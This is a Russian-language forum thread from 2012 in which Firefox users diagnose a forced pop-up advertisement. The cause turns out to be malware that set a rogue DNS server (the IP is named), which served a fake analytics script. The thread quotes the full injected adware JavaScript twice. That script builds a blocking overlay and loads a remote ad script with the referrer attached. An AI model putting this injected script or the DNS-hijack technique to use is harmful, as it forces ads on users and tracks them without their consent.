Здравствуйте, пару дней назад появилась проблема.
При открытии разных сайтов, где раньше никогда не было рекламы, выскакивает рекламное окно. Вчера целый день выскакивала реклама marketgid, сегодня поменялось на "БЕСПЛАТНОЕ ТЕСТИРОВАНИЕ ОТ (название открываемого сайта)". На этом сайте выскочило то же самое окно.
Рекламное окно на javascript.
В других браузерах тоже самое.
Ось - вин хр.
Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
Заранее спасибо за помощь.
Всем привет, немного разобрался в ситуации.
1. Дело не в браузере, в других браузерах вчера началось то же самое.
2. Проблема не в роутере и не в провайдере, на другом компе в локалке такого нет.
3. Начал копаться в html коде forum.mozilla-russia.org и кое-что нарыл:
В исходнике есть блок яндекс метрика, он загружает сценарий javascript по адресу mc.yandex.ru/resource/watch.js, который поверх окна сайта выводит рекламное окно и загружает другой сценарий по адресу http://c.luxup.ru/t/lb123811.js, который в свою очередь скачивает картинки и заполняет ими уже созданное окно.
Окно вылазит не постоянно, а с разной периодичностью: иногда по адресу mc.yandex.ru/resource/watch.js лежит пустой файл и выполняться просто нечему.
На другом компе, где этой проблемы нет, набираю mc.yandex.ru/resource/watch.js, а там лежит обычный скрипт яндекс метрики, который никаких рекламных окон не загружает.
Естесственно сразу кинулся проверять файл hosts на предмет перенаправлений, но там все нормально.
У кого какие мысли по этому поводу?
Watch.js
function f_clientWidth() {
return f_filterResults (
window.innerWidth ? window.innerWidth : 0,
document.documentElement ? document.documentElement.clientWidth : 0,
document.body ? document.body.clientWidth : 0
);
}
function f_clientHeight() {
return f_filterResults (
window.innerHeight ? window.innerHeight : 0,
document.documentElement ? document.documentElement.clientHeight : 0,
document.body ? document.body.clientHeight : 0
);
}
function f_scrollLeft() {
return f_filterResults (
window.pageXOffset ? window.pageXOffset : 0,
document.documentElement ? document.documentElement.scrollLeft : 0,
document.body ? document.body.scrollLeft : 0
);
}
function f_scrollTop() {
return f_filterResults (
window.pageYOffset ? window.pageYOffset : 0,
document.documentElement ? document.documentElement.scrollTop : 0,
document.body ? document.body.scrollTop : 0
);
}
function popMove()
{
popDiv = document.getElementById("popDiv");
if(popDiv != null)
{
popDiv.style.left = ((f_clientWidth() - 850)/ 2) + f_scrollLeft () + "px";
popDiv.style.top = ((f_clientHeight() - 550) / 2) + f_scrollTop () + "px";
}
}
function popHide()
{
popDiv = document.getElementById("popDiv");
clearInterval(popMoveRun);
popDiv.style.display = 'none';
return false;
}
function popShowClose()
{
popControl = document.getElementById("popControl");
popControl.style.display = 'block';
}
if(typeof(popMutex) == "undefined" && typeof(hrMutex) == "undefined")
{
var popMutex = true;
var popDiv = document.createElement("div");
popDiv.id = "popDiv";
popDiv.style.position = "absolute";
popDiv.style.width = "850px";
popDiv.style.height = "550px";
popDiv.style.backgroundColor = "white";
popDiv.style.zIndex = "1000";
popDiv.onclick = popShowClose;
document.body.appendChild(popDiv);
var advName = "DataMind";
var popInfo = document.createElement("div");
popInfo.id = "popInfo";
popInfo.style.position = "absolute";
popInfo.style.left = "10px";
popInfo.style.fontSize = "11px";
popInfo.style.fontWeight = "bold";
popInfo.style.padding = "0 1px 25px";
popInfo.style.height = "13px";
popInfo.style.color = "black";
popInfo.style.fontFamily = "Tahoma, Arial, sans-serif";
popInfo.style.display = "block";
popInfo.innerHTML = "Реклама системы " + advName + " <font color=\"red\">Посетите сайт спонсора чтобы продолжить просмотр сайта</font>";
popDiv.appendChild(popInfo);
var popControl = document.createElement("div");
popControl.id = "popControl";
popControl.style.position = "absolute";
popControl.style.right = "10px";
popControl.style.display = 'none';
popDiv.appendChild(popControl);
var popControlClose = document.createElement("a");
popControlClose.href = "#";
popControlClose.onclick = popHide;
popControlClose.style.fontSize = "11px";
popControlClose.style.fontWeight = "bold";
popControlClose.style.padding = "0 1px 25px";
popControlClose.style.color = "#096";
popControlClose.style.height = "13px";
popControlClose.style.fontFamily = "Tahoma, Arial, sans-serif";
popControlClose.style.display = "block";
popControlClose.innerHTML = "Закрыть";
popControl.appendChild(popControlClose);
var adDiv = document.createElement("div");
adDiv.id = "lx_381874";
adDiv.style.position = "absolute";
adDiv.style.top = "15px";
popDiv.appendChild(adDiv);
var adScript = document.createElement("script");
adScript.type = "text/javascript";
adScript.language="JavaScript";
adScript.charset = "utf-8";
adScript.src = "http://c.luxup.ru/t/lb123811.js?rt=" + (new Date).getTime() % 1E7 * 100 + Math.round(Math.random() * 99) + (document.referrer ? ("&r=" + escape(document.referrer)) : "");
document.body.appendChild(adScript);
var popMoveRun = setInterval (popMove, 10);
setTimeout(popShowClose, 10000);
}
Отредактировано archie (20-12-2012 10:27:31)
Отсутствует
Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
обновитесь + новый профиль
Добавлено 18-12-2012 18:07:38
Починка браузера. Перенос своих настроек на новый профиль.
Отредактировано feas (18-12-2012 18:07:38)
Добро пожаловать на форум mozilla-russia.org. Здесь вы можете посоветоваться или обратиться за помощью к фанатам и пользователям продуктов Мозиллы. Если не знаете как правильно оформить пост специально для вас расписан пункт 2.2 правил форума
Сброс на примере Firefox – лёгкое решение большинства проблем
Починка браузера. Перенос своих настроек на новый профиль.
Отсутствует
archie пишетПодскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
обновитесь + новый профиль
Добавлено 18-12-2012 18:07:38
Починка браузера. Перенос своих настроек на новый профиль.
Ну, я в принципе догадался, что зараза скорее всего где-то в файлах настройки. Просто никогда раньше такого не встречал, холельсь бы разобраться что это и где оно сидит.
Добавлено 18-12-2012 18:20:14
Кстати, забыл - примерно в это же время в %USERDIR%\aplication data появился какой-то эгзэшник что-то типа "20lg16p1s.exe", который пытался связаться с сайтом по-моему lcogum dot net (его каспер нашел). я его удалил, потом просканировал папку пользователя - каспер ничего не нашел.
Отредактировано archie (18-12-2012 18:20:14)
Отсутствует
"20lg16p1s.exe", который пытался связаться с сайтом по-моему lcogum dot net (его каспер нашел). я его удалил
молодец.
подобные exe ещё стоит поискать в автозагрузке (msconfig в строке выполнить - соотв. вкладка)
Что делать, если есть подозрение на заражение системы вирусами?
Ну и я доверяю этим парням, антивирусам http://skt.admyn.ru/more.php?tid=10
Добро пожаловать на форум mozilla-russia.org. Здесь вы можете посоветоваться или обратиться за помощью к фанатам и пользователям продуктов Мозиллы. Если не знаете как правильно оформить пост специально для вас расписан пункт 2.2 правил форума
Сброс на примере Firefox – лёгкое решение большинства проблем
Починка браузера. Перенос своих настроек на новый профиль.
Отсутствует
подобные exe ещё стоит поискать в автозагрузке (msconfig в строке выполнить - соотв. вкладка)
Ну он собственно в автозагрузке и стоял, после удаления загружать больше нечего
Вопрос есть ли связь между ним и лисом, в других браузерах же все норм. Уже перерыл всю папку профиля лиса. По идее нужно искать какой-нибудь .js файл?
Отсутствует
По идее нужно искать какой-нибудь .js файл?
зачем? лучше проверьте осталась ли проблема? вирус просто воспользовался тем что в 3.6 больше необновляется ваша же безопасность. Аналогично и в ХР. Каспер видно тоже подвел.
Отредактировано feas (18-12-2012 18:53:35)
Добро пожаловать на форум mozilla-russia.org. Здесь вы можете посоветоваться или обратиться за помощью к фанатам и пользователям продуктов Мозиллы. Если не знаете как правильно оформить пост специально для вас расписан пункт 2.2 правил форума
Сброс на примере Firefox – лёгкое решение большинства проблем
Починка браузера. Перенос своих настроек на новый профиль.
Отсутствует
зачем? лучше проверьте осталась ли проблема? вирус просто воспользовался тем что в 3.6 больше необновляется ваша же безопасность. Аналогично и в ХР. Каспер видно тоже подвел.
Проблема никуда не пропадала, тот эгзэшник я удалил еще позавчера, когда проблема только появилась, насчет заражения системы говорить преждевременно. повторяю проблема лишь в firefox, в остальных браузерах ее нет. Скорее всего где-то запускается какой-то сценарий javascript при работе в лисе
Добавлено 18-12-2012 19:06:04
Еще раз повторю, проблему локализировал на сколько смог :
1. Проявляется только в firefox.
2. При отключении javascript проблема исчезает.
Может кто-нибудь с этим сталкивался?
Отредактировано archie (18-12-2012 19:06:04)
Отсутствует
папка chrome в ней userChrome.js - только так.
Папки профиля
тут список всех рабочих файлов - лишние как правило либо часть расширения либо то что ты ищешь.
Добро пожаловать на форум mozilla-russia.org. Здесь вы можете посоветоваться или обратиться за помощью к фанатам и пользователям продуктов Мозиллы. Если не знаете как правильно оформить пост специально для вас расписан пункт 2.2 правил форума
Сброс на примере Firefox – лёгкое решение большинства проблем
Починка браузера. Перенос своих настроек на новый профиль.
Отсутствует
Такая же проблема... уже замучился... ни один антивирусник не ищет...
выскакивает тот баннер что написал ТС и еще "Бесплатное тестирование от сайта хххх"
кстати в опере тоже выскакивает...
Отредактировано gjurza (19-12-2012 23:08:51)
Отсутствует
_http://www.toolbarcleaner.com/ позволяет удалить левое ПО, дополнения, но самостоятельно и осторожно. И Malwarebytes Anti-Malware удаляет автоматически всякие бяки.
Отсутствует
Такая же проблема... уже замучился... ни один антивирусник не ищет...
выскакивает тот баннер что написал ТС и еще "Бесплатное тестирование от сайта хххх"
кстати в опере тоже выскакивает...
не находит.... все напрасно
Отредактировано gjurza (20-12-2012 01:49:49)
Отсутствует
Всем привет, немного разобрался в ситуации.
1. Дело не в браузере, в других браузерах вчера началось то же самое.
2. Проблема не в роутере и не в провайдере, на другом компе в локалке такого нет.
3. Начал копаться в html коде forum.mozilla-russia.org и кое-что нарыл:
В исходнике есть блок яндекс метрика, он загружает сценарий javascript по адресу mc.yandex.ru/resource/watch.js, который поверх окна сайта выводит рекламное окно и загружает другой сценарий по адресу http://c.luxup.ru/t/lb123811.js, который в свою очередь скачивает картинки и заполняет ими уже созданное окно.
Окно вылазит не постоянно, а с разной периодичностью: иногда по адресу mc.yandex.ru/resource/watch.js лежит пустой файл и выполняться просто нечему.
На другом компе, где этой проблемы нет, набираю mc.yandex.ru/resource/watch.js, а там лежит обычный скрипт яндекс метрики, который никаких рекламных окон не загружает.
Естесственно сразу кинулся проверять файл hosts на предмет перенаправлений, но там все нормально.
У кого какие мысли по этому поводу?
Watch.js
function f_clientWidth() {
return f_filterResults (
window.innerWidth ? window.innerWidth : 0,
document.documentElement ? document.documentElement.clientWidth : 0,
document.body ? document.body.clientWidth : 0
);
}
function f_clientHeight() {
return f_filterResults (
window.innerHeight ? window.innerHeight : 0,
document.documentElement ? document.documentElement.clientHeight : 0,
document.body ? document.body.clientHeight : 0
);
}
function f_scrollLeft() {
return f_filterResults (
window.pageXOffset ? window.pageXOffset : 0,
document.documentElement ? document.documentElement.scrollLeft : 0,
document.body ? document.body.scrollLeft : 0
);
}
function f_scrollTop() {
return f_filterResults (
window.pageYOffset ? window.pageYOffset : 0,
document.documentElement ? document.documentElement.scrollTop : 0,
document.body ? document.body.scrollTop : 0
);
}
function popMove()
{
popDiv = document.getElementById("popDiv");
if(popDiv != null)
{
popDiv.style.left = ((f_clientWidth() - 850)/ 2) + f_scrollLeft () + "px";
popDiv.style.top = ((f_clientHeight() - 550) / 2) + f_scrollTop () + "px";
}
}
function popHide()
{
popDiv = document.getElementById("popDiv");
clearInterval(popMoveRun);
popDiv.style.display = 'none';
return false;
}
function popShowClose()
{
popControl = document.getElementById("popControl");
popControl.style.display = 'block';
}
if(typeof(popMutex) == "undefined" && typeof(hrMutex) == "undefined")
{
var popMutex = true;
var popDiv = document.createElement("div");
popDiv.id = "popDiv";
popDiv.style.position = "absolute";
popDiv.style.width = "850px";
popDiv.style.height = "550px";
popDiv.style.backgroundColor = "white";
popDiv.style.zIndex = "1000";
popDiv.onclick = popShowClose;
document.body.appendChild(popDiv);
var advName = "DataMind";
var popInfo = document.createElement("div");
popInfo.id = "popInfo";
popInfo.style.position = "absolute";
popInfo.style.left = "10px";
popInfo.style.fontSize = "11px";
popInfo.style.fontWeight = "bold";
popInfo.style.padding = "0 1px 25px";
popInfo.style.height = "13px";
popInfo.style.color = "black";
popInfo.style.fontFamily = "Tahoma, Arial, sans-serif";
popInfo.style.display = "block";
popInfo.innerHTML = "Реклама системы " + advName + " <font color=\"red\">Посетите сайт спонсора чтобы продолжить просмотр сайта</font>";
popDiv.appendChild(popInfo);
var popControl = document.createElement("div");
popControl.id = "popControl";
popControl.style.position = "absolute";
popControl.style.right = "10px";
popControl.style.display = 'none';
popDiv.appendChild(popControl);
var popControlClose = document.createElement("a");
popControlClose.href = "#";
popControlClose.onclick = popHide;
popControlClose.style.fontSize = "11px";
popControlClose.style.fontWeight = "bold";
popControlClose.style.padding = "0 1px 25px";
popControlClose.style.color = "#096";
popControlClose.style.height = "13px";
popControlClose.style.fontFamily = "Tahoma, Arial, sans-serif";
popControlClose.style.display = "block";
popControlClose.innerHTML = "Закрыть";
popControl.appendChild(popControlClose);
var adDiv = document.createElement("div");
adDiv.id = "lx_381874";
adDiv.style.position = "absolute";
adDiv.style.top = "15px";
popDiv.appendChild(adDiv);
var adScript = document.createElement("script");
adScript.type = "text/javascript";
adScript.language="JavaScript";
adScript.charset = "utf-8";
adScript.src = "http://c.luxup.ru/t/lb123811.js?rt=" + (new Date).getTime() % 1E7 * 100 + Math.round(Math.random() * 99) + (document.referrer ? ("&r=" + escape(document.referrer)) : "");
document.body.appendChild(adScript);
var popMoveRun = setInterval (popMove, 10);
setTimeout(popShowClose, 10000);
}
Отредактировано archie (20-12-2012 06:56:28)
Отсутствует
archie
Вот http://virusinfo.info/showthread.php?t=129046 должны решить со дня на день....
Отсутствует
Тоже самое!
На всех браузерах при открытии любого сайта "Реклама системы DataMind Посетите сайт спонсора чтобы продолжить просмотр сайта"
Не какие антивирусы не помогают.
Что делать куда копать?
Добавлено 20-12-2012 14:33:00
Если в браузере отключаешь javascript то всплывающее окно пропадает
Отредактировано lsn (20-12-2012 14:33:00)
Отсутствует
Я решил такую же проблему! Сам попался. Вирус просто тупо меняет адрес DNS сервера в свойствах сетевого подключения на свой, фальшивый. Соответственно, никакая антивирусная программа этого не обнаруживает.
Отсутствует
Я решил такую же проблему! Сам попался. Вирус просто тупо меняет адрес DNS сервера в свойствах сетевого подключения на свой, фальшивый. Соответственно, никакая антивирусная программа этого не обнаруживает.
Да действительно, вы правы - зашел в настройки ТСП ИП и нашел там ложный ДНС... еще советую в регистре найти этот ключик и удалить: O17 - HKLM\System\CCS\Services\Tcpip\..\{F89B57C1-93A9-4205-8E74-88ECC3D07C69}: NameServer = 5.199.140.180
Отсутствует
Все верно, в реестре в ключе HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\{abbracaddabra}: NameServer стоял адрес 5.199.140.180.
Но вопрос остается - КТО ЭТО СДЕЛАЛ ???
Отсутствует
Но вопрос остается - КТО ЭТО СДЕЛАЛ ???
Я точно знаю, кто это сделал: radikal.ru
Может, кто-то еще делает, но у меня без вариантов, загружала фотку и уже тогда у меня возникли подозрения, а после рестарта оперы началось...
У меня еще во всех браузерах стартовая поменялась на http://mailrusearchgo.ru
Отредактировано tetiana (21-12-2012 15:05:07)
Отсутствует
Я имел в виду, что за программа сделала запись в реестр и как она вообще ко мне попала ? А то получается без меня меня женили, а я вроде как вообще не при делах
P.S. А на варезники я вообще никогда не захожу.
Отредактировано archie (21-12-2012 16:11:51)
Отсутствует
Радикал? Хм... Я вроде ему доверяю. Вы смотрите, если ДНС не тот - откроется что угодно.
Добро пожаловать на форум mozilla-russia.org. Здесь вы можете посоветоваться или обратиться за помощью к фанатам и пользователям продуктов Мозиллы. Если не знаете как правильно оформить пост специально для вас расписан пункт 2.2 правил форума
Сброс на примере Firefox – лёгкое решение большинства проблем
Починка браузера. Перенос своих настроек на новый профиль.
Отсутствует
А на варезники я вообще никогда не захожу.
Это не варезник, это фотохостинг и "программа" пришла именно оттуда.
Радикал? Хм... Я вроде ему доверяю.
Я тоже ему доверяла, хотя каспер и предупреждал, но думала, что каспер и опера его блокируют из-за чрезмерной рекламы. Но это радикал без вариантов, потому что это единственный сайт, который я посетила перед заражением и вообще единственное действие с моей стороны перед заражением.
Отсутствует